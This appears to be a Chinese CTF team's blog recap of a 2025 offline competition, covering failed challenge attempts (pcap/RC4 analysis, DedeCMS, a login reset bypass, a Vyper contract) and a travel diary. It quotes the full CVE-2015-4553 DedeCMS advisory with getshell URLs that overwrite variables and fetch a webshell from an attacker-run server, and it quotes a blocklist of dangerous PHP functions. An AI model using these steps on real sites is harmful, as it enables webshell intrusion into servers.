./bin: 2463: 99e0: not found
./bin: 2464: 99f0: not found
./bin: 2465: 9a00: not found
./bin: 2466: 9a10: not found
./bin: 2467: 9a20: not found
./bin: 2468: 9a30: not found
./bin: 2469: 9a40: not found
./bin: 2470: 9a50: not found
./bin: 2471: 9a60: not found
./bin: 2472: 9a70: not found
./bin: 2473: 9a80: not found
./bin: 2474: 9a90: not found
./bin: 2475: 9aa0: not found
./bin: 2476: 9ab0: not found
./bin: 2477: 9ac0: not found
./bin: 2478: 9ad0: not found
./bin: 2479: 9ae0: not found
./bin: 2480: 9af0: not found
./bin: 2481: 9b00: not found
./bin: 2482: 9b10: not found
./bin: 2483: 9b20: not found
./bin: 2484: 9b30: not found
./bin: 2485: 9b40: not found
./bin: 2486: 9b50: not found
./bin: 2487: 9b60: not found
./bin: 2488: 9b70: not found
./bin: 2489: 9b80: not found
./bin: 2490: 9b90: not found
./bin: 2491: 9ba0: not found
./bin: 2492: 9bb0: not found
./bin: 2493: 9bc0: not found
./bin: 2494: 9bd0: not found
./bin: 2495: 9be0: not found
./bin: 2496: 9bf0: not found
./bin: 2497: 9c00: not found
./bin: 2498: 9c10: not found
./bin: 2499: 9c20: not found
./bin: 2500: 9c30: not found
./bin: 2501: 9c40: not found
./bin: 2502: 9c50: not found
./bin: 2503: 9c60: not found
./bin: 2504: 9c70: not found
./bin: 2505: 9c80: not found
./bin: 2506: 9c90: not found
./bin: 2507: 9ca0: not found
./bin: 2508: 9cb0: not found
./bin: 2509: 9cc0: not found
./bin: 2510: 9cd0: not found
./bin: 2511: 9ce0: not found
./bin: 2512: 9cf0: not found
./bin: 2513: 9d00: not found
./bin: 2514: 9d10: not found
./bin: 2515: 9d20: not found
./bin: 2516: 9d30: not found
./bin: 2517: 9d40: not found
./bin: 2518: 9d50: not found
./bin: 2519: 9d60: not found
./bin: 2520: 9d70: not found
./bin: 2521: 9d80: not found
./bin: 2522: 9d90: not found
./bin: 2523: 9da0: not found
./bin: 2524: 9db0: not found
./bin: 2525: 9dc0: not found
./bin: 2526: 9dd0: not found
./bin: 2527: 9de0: not found
./bin: 2528: 9df0: not found
./bin: 2529: 9e00: not found
./bin: 2530: 9e10: not found
./bin: 2531: 9e20: not found
./bin: 2532: 9e30: not found
./bin: 2533: 9e40: not found
./bin: 2534: 9e50: not found
./bin: 2535: 9e60: not found
./bin: 2536: 9e70: not found
./bin: 2537: 9e80: not found
./bin: 2538: 9e90: not found
./bin: 2539: 9ea0: not found
./bin: 2540: 9eb0: not found
./bin: 2541: 9ec0: not found
./bin: 2542: 9ed0: not found
./bin: 2543: 9ee0: not found
./bin: 2544: 9ef0: not found
./bin: 2545: 9f00: not found
./bin: 2546: 9f10: not found
./bin: 2547: 9f20: not found
./bin: 2548: 9f30: not found
./bin: 2549: 9f40: not found
./bin: 2550: 9f50: not found
./bin: 2551: 9f60: not found

服务器为 172.18.0.2,客户端为 172.18.0.3

因为题目给了与时间戳有关,写个脚本用 tshark 给提取出来

1
2
3
4
5
6
7
@echo off
echo Extracting data...
tshark -r .\output.pcap -Y "tcp && frame.number > 11" -T "fields" -e "frame" -e "frame.time_epoch" -e "data.data" --disable-protocol "http" > data.txt
echo Extracting frames...
tshark -r .\output.pcap -Y "tcp && frame.number > 11" -T "fields" -e "frame" -e "frame.time_epoch" --disable-protocol "http" > frame.txt
echo Extracting time...
tshark -r .\output.pcap -Y "tcp && frame.number > 11" -T "fields" -e "frame.time_epoch" --disable-protocol "http" > time.txt

这样就能够提取出来三个文件(主要是为了对应分析才提取的三个文件)

先写一个脚本提取内容

1
2
3
4
5
6
7
8
9
10
11
12
from pprint import pprint
data_with_time = []

def process_data():
with open("data.txt") as f:
for line in f:
line_data = line.split("\t")
if len(line_data) != 3 or line_data[-1] == "\n":
continue
data_with_time.append((line_data[1].split(".")[0][2:], line_data[2].replace("\n", "")))

pprint(data_with_time)

然后我们的逆向大佬 Jeremiah 根据题目的 CRC64 写了个程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#include <time.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define size 256

unsigned char sbox[257]={0};

//初始化s表
void init_sbox(unsigned char*key){
unsigned int i,j,k;
int tmp;

for(i=0;i<size;i++){
sbox[i]=i;
}

j=k=0;
for(i=0;i<size;i++){
tmp=sbox[i];
j=(j+tmp+key[k])%size;
sbox[i]=sbox[j];
sbox[j]=tmp;
if(++k>=strlen((char*)key))k=0;
}
}

//加解密函数
void rc4_dec(unsigned char*key,unsigned char*data){
int i,j,k,R,tmp;

init_sbox(key);

j=k=0;
for(i=0;i<strlen((char*)data);i++){
j=(j+1)%size;
k=(k+sbox[j])%size;

tmp=sbox[j];
sbox[j]=sbox[k];
sbox[k]=tmp;

R=sbox[(sbox[j]+sbox[k])%size];

data[i]^=R;
}
}

int64_t CRC64(char* buffer){
uint64_t delta = 0x42F0E1EBA9EA3693LL;
int64_t result = 0;
for(int i = 0; i < 40; i++){
result = (int64_t)buffer[i] << 56;
for(int j = 0 ; j < 8; j++){
result = (2 * result) ^ (result >> 63) & delta;
}
}
return result;
}

char* GenerateKey(char* key, char* timestamp){
strcat(key, timestamp);
return key;
}

void db2char(double src, char* dst){
int64_t temp = (int64_t)src;
for(int i = 0; i < 8; i++){
char tmp;
tmp = (char)temp;
dst[i] = tmp;
temp = temp >> 8;
}
}

int main(){
char key[] = "V6h9A_wyEE6YLFiAtxY4W601RkBQIsLn";
char data[] = "f694fa558ef96ff34410143aa6f54a1b62a1130f68fda83e";
// 定义timestamp时间戳
double timestamp = 1733155314.075389000;
char temptime[8];
db2char(timestamp, temptime);
GenerateKey(key, temptime);
CRC64(key);
rc4_dec(key, data);
for(int i = 0 ; i < strlen(data); i++){
printf("%c", data[i]);
}
return 0;
}

但是我们没有能够得到有意义的内容……而且我数据处理是在 Python 中的,于是我考虑到的是使用 Python 调用 C 函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import os
from utils import process_data
from ctypes import c_char_p, c_int, POINTER, CDLL, c_double

# LIB = CDLL(os.path.join(os.getcwd(), "lib.dll"))

LIB.call.argtypes = [c_char_p, c_double]

def dec(stream: str, ts: float):
result = c_char_p()
LIB.call(result, c_double(ts), c_char_p(stream.encode("utf-8")))
return result

if __name__ == "__main__":
result = []
data = process_data()
for _ in data:
ts = _[0]
stream = _[1]
result = ""
result.append(dec(stream, ts))
print(result)
with open("artifact", "wb") as f:
f.write("".join(result).encode())

摆了……

backup

可以看到使用的 CMS 是 dedeCMS 5.7-SP2,我们搜到了一个 CVE-2015-4553,这里写的版本是 dedecms 5.7-sp1,我们想试试 sp2 能不能用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
==========================
# Exploit Title: Dedecms variable coverage leads to getshell
# Date: 26-06-2015
# Vendor Homepage: http://www.dedecms.com/]
# Version: dedecms 5.7-sp1 and all old version
# CVE : CVE-2015-4553
===========================


[CVE-2015-4553]Dedecms variable coverage leads to getshell
#############################################################################
#
# DBAPPSECURITY LIMITED http://www.dbappsecurity.com.cn/
#
#############################################################################
#
# CVE ID: CVE-2015-4553
# Subject: Dedecms variable coverage leads to getshell
# Author: zise
# Date: 06.17.2015
#############################################################################
Introduction:
========
dedecms Open source cms
Extensive application

Influence version
Newest dedecms 5.7-sp1 and all old version


Remote getshell
Details:
=======
After the default installation of dedecms
Installation directory
/install/index.php
or
/install/index.php.bak

/install/index.php //run iis apache exploit
/install/index.php.bak //run apache exploit


Code analysis

/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb

#############################################################################
17 $install_demo_name = 'dedev57demo.txt';
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';

here $install_demo_name and $insLockfile definition
// echo $install_demo_name; printf dedev57demo.txt

29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
30 {
31 foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
32 }


// echo $install_demo_name; printf aaaa

$install_demo_name by variable coverage

The same
17 $install_demo_name = 'dedev57demo.txt';
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';

variable coverage
#############################################################################




GETSHELL Step 1 Clear file contents config_update.php
#############################################################################
config_update.php
13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
14 $linkHost = 'http://flink.dedecms.com/server_url.php';

In order to obtain the webshell need to control $updateHost
So the use of variable coverags cleared config_update.php


http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php

index.php.bak
373 else if($step==11)
374 {
375 require_once('../data/admin/config_update.php');
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
377
378 $sql_content = file_get_contents($rmurl);
379 $fp = fopen($install_demo_name,'w');
380 if(fwrite($fp,$sql_content))
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
382 else
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
384 unset($sql_content);
385 fclose($fp);
386 exit();
387 }

###
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 06:55:23 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: User-Agent
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<font color="red">[×]</font> 远程获取失败
###




###After execution file 0 byte ~ho~year~####
2015/06/17 14:55 0 config_update.php
1 file 0 byte



GETSHELL Step 2
#############################################################################
Create local HTTP services

zise:tmp zise$ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 119.253.3.18 netmask 0xffffff00 broadcast

zise:tmp zise$ mkdir "dedecms"
zise:tmp zise$ cd dedecms/
zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
zise:dedecms zise$ cd ../
zise:tmp zise$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -


####
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://119.253.3.18:8000/

####

HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 07:11:18 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: Accept-Encoding,User-Agent
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<font color="green">[√]</font> 存在(您可以选择安装进行体验)


index.php.bak
373 else if($step==11)
374 {
375 require_once('../data/admin/config_update.php');
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
377
378 $sql_content = file_get_contents($rmurl);
379 $fp = fopen($install_demo_name,'w');
380 if(fwrite($fp,$sql_content)) //fwrite websehll
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
382 else
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
384 unset($sql_content);
385 fclose($fp);
386 exit();
387 }

Attack complete
you webshell

http://192.168.204.135/install/hello.php



> zise ^_^
> Security researcher

This is the vulnerability of some web pages
http://seclists.org/fulldisclosure/2015/Jun/47

然后 Rusty 不知道用啥方法进去了(队内共享文档没写……) Rusty 用的方法大致是这个方案(https://cloud.tencent.com/developer/article/1850813),我们能够使用我们自己的数据库(MariaDB),让这个 CMS 连接我们的数据库进行操作,我们成功登录了管理员

我们尝试传马上去,但是这个 CMS 自带了一个危险代码检测功能

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
// 不允许这些字符
$content = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $content);

global $cfg_disable_funs;
$cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace';
$cfg_disable_funs = $cfg_disable_funs.',[$]GLOBALS,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,require,create_function,array_map,call_user_func,call_user_func_array,array_filert';
foreach (explode(",", $cfg_disable_funs) as $value) {
$value = str_replace(" ", "", $value);
if(!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", " {$content}") == TRUE) {
$content = dede_htmlspecialchars($content);
die("DedeCMS提示:当前上传的文件中存在恶意代码!<pre>{$content}</pre>");
}
if(!empty($value) && preg_match("#(<)[\s]*(script)[\s\S]*(src)[\s]*(=)[\s]*[\"|']#i", " {$content}") == TRUE) {
preg_match_all("#(src)[\s]*(=)[\s]*[\"|'][\s]*((http|https)(:\/\/)[\S]*)[\"|']#i", " {$content}", $subject);
foreach ($subject[3] as $url) {
if (preg_match("#^(http|https):\/\/#i", $url) && !preg_match("#^(http|https):\/\/{$_SERVER['HTTP_HOST']}#i", $url)) {
die("DedeCMS提示:非本站资源无法访问!<pre>{$url}</pre>");
}
}
}
}

if(preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", " {$content}") == TRUE && json_encode($content) !== FALSE) {
if(preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", " {$content}") == TRUE) {
$content = dede_htmlspecialchars($content);
die("DedeCMS提示:当前上传的文件中存在木马!<pre>{$content}</pre>");
}
if(preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", " {$content}") == TRUE) {
$content = dede_htmlspecialchars($content);
die("DedeCMS提示:当前上传的文件中存在木马!<pre>{$content}</pre>");
}
if(preg_match("#[`][\s\S]*[`]#i", " {$content}") == TRUE) {
$content = dede_htmlspecialchars($content);
die("DedeCMS提示:当前上传的文件中存在后门!<pre>{$content}</pre>");
}
if(preg_match("#['\"][\^]['\"]#i", " {$content}") == TRUE) {
$content = dede_htmlspecialchars($content);
die("DedeCMS提示:当前上传的文件中存在后门!<pre>{$content}</pre>");
}
}

直到最后都没有成功,而且这个 CMS 连接我们的数据库特别的慢(指一个请求三十秒没完成)

ctos1

这个题目附件给了我们一个 zip,我们一开始还以为需要解压这个 zip 才能做,结果后来发现是不用的……

(下图人话:用你第一题的 flag 来解压文件)

打开提供的网页,是一个教务系统的登录,尝试进入重置密码的界面,在登录账号处输入账号,如果不存在会提示用户不存在,所以我们可以根据这个提示得到用户

最终我们得到了两个用户:xs001admin

接着,我们尝试了一下重置密码,就什么都不提供的发送请求

看请求应该是先判断 encoded 对应的账户是不是管理员,然后重置密码的时候看的是account的账户,所以如果encoded对应的是非管理员用户就有可能绕过这个限制直接重置管理员账户的密码,encoded 是用户名的 b64 编码

在登录页面,我们发现登录是 POST 路由 /bzd_jsxsd/xk/LoginToXk

其中 userAccount 是用户名,userPassword 为空,encoded 是用户名+密码的组合,例如使用用户名 xs001 和密码 abc 组合后为 xs001%%%abc,然后经过 Base64 编码 + URL 编码

没找到更多入口了,跑路了

pokemongo

pokemon go 提示:

  • fight_internal 为什么调用只使用了一个参数?
  • 结合让攻击力变大的方法通过题目吧

题目描述:

现身!月亮与太阳的化身! nc 10.110.0.5 31337

╰─ nc 10.110.0.5 31337
1 - launch new instance
2 - kill instance
3 - get flag (if is_Solved() is true)
action? 1

== PoW ==
sha256(“c33b6138cf7ba005” + YOUR_INPUT) must start with 24 zeros in binary representation
please run the following command to solve it:
python3 <(curl -sSL https://minaminao.github.io/tools/solve-pow.py) c33b6138cf7ba005 24

YOUR_INPUT =

这个题目我们上来就在猜是不是 web3 的题目,结果还真是

有这么一个小趣事:在这次比赛之前,我是有做梦梦到过线下赛出 web3 题目的,但是当时并没有太过于关注这个梦,现在这个梦成真了……

根据题目给我们的输出,sha256("c33b6138cf7ba005" + YOUR_INPUT) must start with 24 zeros in binary representation,我们输入的内容加在题目提供的字符串后面,进行 sha256 的计算后,这个结果由 24 个二进制 0 开头,也就是说计算得到的哈希值一定为 6 个 0 开头,于是就有了我们的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from pwn import *
from hashlib import sha256
from string import ascii_letters, digits
from itertools import combinations

remote_addr = '10.110.0.5'
remote_port = 31337


def verify_sha256(s):
return sha256(s.encode()).hexdigest().startswith("0"*6)

def calc_sha256(s):
return sha256(s.encode()).hexdigest()

dict = ascii_letters + digits

def exp():
# context.log_level = "DEBUG"

p = remote(remote_addr ,remote_port)
p.recvuntil(b"action?")
p.sendline(b"1")
p.recvuntil(b'sha256("')
pre = p.recv(16).decode()
print(f"[~] pre = {pre}")
p.recvuntil(b"YOUR_INPUT =")

count = 1
solved = False
my_input = ""
while not solved:
for combination in combinations(dict, count):
s = pre + "".join(combination)
# print(f"[~] WORKING:", s, end="\r")
if verify_sha256(s):
my_input = s[16:]
print("[+] SOLVED: ", s , my_input)
solved = True
break
count += 1

p.sendline(my_input.encode())
p.recvuntil(b"here's some useful information")
print('[+] Deploying...')
print(p.recvall().decode())

if __name__ == "__main__":
exp()

完成后会给我们返回一个钱包的私钥,这个钱包里面有米,但说实话,我们不会做 web3 的题目,只能放掉了,下面提供一下我们找到的源码吧

比赛后我们学校两个队在讨论的时候,隔壁队说这个应该是 vyper

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#@version ^0.3.7

Gyarados_hp: public(int256)
rounds: public(uint256)
struct pokemon:
name: String[1]
health: int256
atk: int256

Necrozma: public(pokemon)

Solgaleo: public(pokemon)

Dusk_Mane_Necrozma: public(pokemon)

upgraded: public(bool)

win: public(bool)

@external
def __init__():
self.rounds=5
self.Necrozma.health=200
self.Necrozma.atk=100
self.Solgaleo.health=150
self.Solgaleo.atk=50
self.Gyarados_hp=100000


@external
def autophagy(_id:uint256):
if _id==1:
assert self.Solgaleo.health<=1000 ,"Crazy man..."
self.Solgaleo.health+=10
self.Solgaleo.atk-=3
if _id==2:
assert self.Necrozma.health<=1000 ,"Crazy man..."
self.Necrozma.health+=50
self.Necrozma.atk-=7

@external
def game_init(_name: String[1],_name2: String[1]):
pass

@internal
def fight_internal(power_1:int256=0 ,power_2:int256=2**254) -> int256:
return power_1-power_2

@external
def set_name(_name1: String[1],_name2: String[1]):
assert self.upgraded==False,"NO"
self.Necrozma.name=_name1
self.Solgaleo.name=_name2

@external
def fight(_id:uint256):
assert self.rounds>0 , "no more chance"
self.rounds-=1
# Maybe only one chance?...
if _id==1 and self.upgraded==False:
assert self.Necrozma.health>0,"dead"
power: int256=self.fight_internal(self.Necrozma.atk)
assert power>0, "Too weak...."
self.Necrozma.health-=50
if self.Gyarados_hp<=power:
self.win=True

elif _id==2 and self.upgraded==False:
assert self.Solgaleo.health>0,"dead"
power: int256=self.fight_internal(self.Solgaleo.atk)
assert power>0, "Too weak...."
self.Solgaleo.health-=50
if self.Gyarados_hp<=power:
self.win=True
elif _id==3:
assert self.upgraded==True, "Do something first"
power: int256=self.fight_internal(self.Dusk_Mane_Necrozma.atk)
assert power>0, "Too weak...."
self.rounds=1
# Really???
if self.Gyarados_hp<=power:
self.win=True
self.rounds-=1

@internal
def get_upgraded() -> int256:
a: int256 = self.Necrozma.atk
b: int256 = self.bar()
return a+b

@external
def do_combine():
self.upgraded=True
self.Dusk_Mane_Necrozma.atk=self.get_upgraded()

@internal
def bar() -> int256:
combined_name: String[2] = concat(self.Necrozma.name, self.Solgaleo.name)
return 1


@external
def is_Solved() -> bool:
return self.win

题目的二进制产物

1
0x346109aa57600560015560c8600455606460055560966008556032600955620186a060005561097361003661000039610973610000f36003361161000c576108be565b60003560e01c346109615763b965f6a181186101605760243610610961576001600435186100c4576103e8600854131561009d57600c6040527f4372617a79206d616e2e2e2e000000000000000000000000000000000000000060605260405060405180606001601f826000031636823750506308c379a06000526020602052601f19601f6040510116604401601cfd5b600854600a8101818112610961579050600855600954600381038181136109615790506009555b60026004351861015e576103e8600454131561013757600c6040527f4372617a79206d616e2e2e2e000000000000000000000000000000000000000060605260405060405180606001601f826000031636823750506308c379a06000526020602052601f19601f6040510116604401601cfd5b60045460328101818112610961579050600455600554600781038181136109615790506005555b005b63d02b607d81186101b757608436106109615760043560040160018135116109615780358060405260208201803560605250505060243560040160018135116109615780358060805260208201803560a052505050005b63e1430e06811861028f57608436106109615760043560040160018135116109615780358060405260208201803560605250505060243560040160018135116109615780358060805260208201803560a052505050600e541561027157600260c0527f4e4f00000000000000000000000000000000000000000000000000000000000060e05260c05060c0518060e001601f826000031636823750506308c379a0608052602060a052601f19601f60c0510116604401609cfd5b60405180600255606051600355506080518060065560a05160075550005b63df6a37aa811861069357602436106109615760015461030657600e6080527f6e6f206d6f7265206368616e636500000000000000000000000000000000000060a0526080506080518060a001601f826000031636823750506308c379a06040526020606052601f19601f6080510116604401605cfd5b6001546001810381811161096157905060015560016004351861032c57600e541561032f565b60005b61056f5760026004351861034657600e5415610349565b60005b61045c5760036004351861067e576001600e5418156103bf5760126080527f446f20736f6d657468696e67206669727374000000000000000000000000000060a0526080506080518060a001601f826000031636823750506308c379a06040526020606052601f19601f6080510116604401605cfd5b600d5460405260006060526103d460a06108c4565b60a0516080526001608051121561044257600c60a0527f546f6f207765616b2e2e2e2e000000000000000000000000000000000000000060c05260a05060a0518060c001601f826000031636823750506308c379a06060526020608052601f19601f60a0510116604401607cfd5b60016001556080516000541361067e576001600f5561067e565b600160085412156104c45760046080527f646561640000000000000000000000000000000000000000000000000000000060a0526080506080518060a001601f826000031636823750506308c379a06040526020606052601f19601f6080510116604401605cfd5b60095460405260006060526104d960a06108c4565b60a0516080526001608051121561054757600c60a0527f546f6f207765616b2e2e2e2e000000000000000000000000000000000000000060c05260a05060a0518060c001601f826000031636823750506308c379a06060526020608052601f19601f60a0510116604401607cfd5b600854603281038181136109615790506008556080516000541361067e576001600f5561067e565b600160045412156105d75760046080527f646561640000000000000000000000000000000000000000000000000000000060a0526080506080518060a001601f826000031636823750506308c379a06040526020606052601f19601f6080510116604401605cfd5b60055460405260006060526105ec60a06108c4565b60a0516080526001608051121561065a57600c60a0527f546f6f207765616b2e2e2e2e000000000000000000000000000000000000000060c05260a05060a0518060c001601f826000031636823750506308c379a06060526020608052601f19601f60a0510116604401607cfd5b600454603281038181136109615790506004556080516000541361067e576001600f555b60015460018103818111610961579050600155005b63f589d1a081186106bf5760043610610961576001600e556106b661012061092b565b61012051600d55005b63fa73a16c81186106de576004361061096157600f5460405260206040f35b63fd23d16881186106fd57600436106109615760005460405260206040f35b63a2e800ad811861071c57600436106109615760015460405260206040f35b633a956e74811861079257600436106109615760208060405280604001606080825280820160025480825260208201600354815250508051806020830101601f82600003163682375050601f19601f82516020010116905081019050600454602083015260055460408301529050810190506040f35b631b05174c811861080857600436106109615760208060405280604001606080825280820160065480825260208201600754815250508051806020830101601f82600003163682375050601f19601f82516020010116905081019050600854602083015260095460408301529050810190506040f35b63fb905dc8811861087e576004361061096157602080604052806040016060808252808201600a5480825260208201600b54815250508051806020830101601f82600003163682375050601f19601f82516020010116905081019050600c546020830152600d5460408301529050810190506040f35b63c28de2cd811861089d576004361061096157600e5460405260206040f35b63473ca96c81186108bc576004361061096157600f5460405260206040f35b505b60006000fd5b60405160605180820382811360008312186109615790509050815250565b60006002548160a0016003548152508082019150506006548160a00160075481525080820191505080608052608090508051806040526020820180516060525050506001815250565b60055460c05261093c6101006108e2565b6101005160e05260c05160e05180820182811260008312186109615790509050815250565b600080fda165767970657283000307000b005b600080fd

我顺带试了一下题目提供的那个网络上的破解脚本

1
2
3
4
╰─ python3 <(curl -sSL https://minaminao.github.io/tools/solve-pow.py) c33b6138cf7ba005 24                                                                                                       ─╯ 
your_input = b'42350263'
digest.hex() = '00000079df581a1f503ae965ec65731ab3a5bd08acd2be21b78a9450d08a0c58'
time.time() - start_time = 59.04572939872742

还是能用的

app debug

这个题目应该算是福利题,根据 J 佬自己的话说就一个 XTEA,但是在比赛的时候脚本写错了没找到问题导致没做出来

旅游

终于快进到旅游环节了嘛(耶~~~

Day 1 (2025.5.16 Fri.)

我们其实本来是一个队伍周五一起去的,但是 Jeremiah 受邀参加腾讯游戏安全的那个会议了,然后 Ron 周五要考线性代数,结果只有我和 Rusty 两个人第一天去

我们订的酒店是一家民宿,本来我们是打算定大广场的酒店的,但是那家酒店没有洗衣房(问就是深圳亚朵惯的),所以我们最后挑来挑去,挑到了这家民宿,它甚至跟大广场的那个酒店是同一价位,但是环境和配置不输给亚朵

鉴定为 买家秀 == 卖家秀,携程上的图片与实际完全相符,好评没跑了

然后我们发现湖南大学那边大学跟社区是完全连在一起的,意思就是说你走在一条街上,这条街属于社区,也属于湖南大学,完全就融为一体了

我们住的民宿从小路出来对面就是广场,左手边就是小吃街,所以我们两个晚餐就是在这条街上解决的。当然来长沙少不了茶颜悦色,所以第一天就已经点了一杯茶颜悦色喝了(忘拍照了)

第一天晚上刚好我在改 B 站新规下的产物(https://github.com/GamerNoTitle/BiliLive-Utility),所以当天很晚了我还没睡,刚好这家酒店在入住的当天,每间房都会赠送一杯鸡尾酒,刚好我和 Rusty 两个人一人一杯,不喝白不喝,所以我们在十点半的时候又去喝了一杯鸡尾酒

据说这杯酒在很多的酒吧都有,是常客,咱也不懂,但是头一次和鸡尾酒以外的挺不错

这杯酒的名字叫做 丛林鸟

喝完以后我也是在凌晨 1:34 的时候发了我的 Release,然后就睡觉了

Day 2 (2025.5.17 Sat.)

因为我和 Rusty 商量要试试民宿的早餐,于是我订了个 9 点的闹钟起来了。民宿的早餐不是自助餐,但是还不错,他是在餐厅里面有个阿姨给客人煮,我这一份是肉丝粉条(应该叫 粿条 梗合适,反正就是河粉那一类的)

是微辣口的,大概率是因为锅自己已经被辣椒渗透了,所以我吃起来是微辣口的,以外的还不错诶

吃完以后就回房间里面休息了,说是休息其实我在打矢量突破(然后被 Mechanist 暴揍

后面队友也来了,我们就找个小笼包店吃了一笼小笼包垫肚子,然后报道去了

途中路过了超算中心

最后走到了开幕式的地方

开幕式结束后,因为二队帮我们拿了报道的材料,然后我们就直接去了橘子洲

回到酒店也是快十点钟了,给我们的参赛证和衣服拍了个排排队的图

Day 3 (2025.5.18 Sun.)

第三天直接就去比赛了,比完赛出来是三点钟,我们又去了我们上次去过的地方——五一广场,主要是去觅食的

首先就有十六进制红绿灯

我们也是找了一家餐馆下了一趟馆子

吃完了就去赶车了,这次的旅游就这样结束啦,回到学校已经快十一点了,洗洗睡啦

Summary

怎么说呢,爆零乃兵家常事,下次加油就好啦~

旅游也是体验生活的一环,下次再来吧

这次的复盘也是拖了足够久啦,主要是刚好回来这周事情太多了,又要补作业又要做小组作业,所以各种各样的东西拖慢了本文出厂的速度,不过磨着磨着还是给它磨出来了

后面期待在网上看到其他师傅在本次比赛中的思路吧,我们队也有很多不足,不过都过去了٩(•̤̀ᵕ•̤́๑)ᵎᵎᵎᵎ